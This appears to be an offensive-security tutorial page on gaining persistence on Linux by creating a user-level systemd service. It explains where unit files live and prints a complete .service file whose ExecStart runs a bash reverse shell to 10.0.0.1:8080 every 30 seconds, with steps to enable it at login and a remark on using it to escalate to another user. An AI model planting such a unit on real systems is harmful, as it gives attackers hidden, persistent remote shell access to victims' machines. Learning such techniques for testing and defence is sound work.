Systemd Service

Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources. Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.

Systemd utilizes unit configurations files with the .service file extension to encode information about a service's process. By default, system level unit files are stored in the /systemd/system directory of the root owned directories (/). User level unit files are stored in the /systemd/user directories of the user owned directories ($HOME).

Now these files have 2 locations and permissions that we can abuse a User and Administrator, in this exercise I'll be working with the User level, I am currently in a Terminal with user level access a .service file needs to be placed in the .config folder of the current users $HOME path the following screenshot will show the full path, if the folders do not exist simply create the path

The contents of the Service file are as follow, a simple bash reverse shell that tries to connect back every 30 seconds

[Unit]
Description=Persistence Service
After=network.target
 
[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do bash -i >& /dev/tcp/10.0.0.1/8080 0>&1; sleep 30; done'
Restart=always
RestartSec=30
 
[Install]
WantedBy=default.target

Will reload the user daemon to have it recognize the new service

And after this we want to enable it so it runs on boot or login time

And once the user logs back in we will grab our reverse shell connection, this is a great method as well to privilege escalate as another user, so keep that in mind, a Demo on this working:

Last updated

Was this helpful?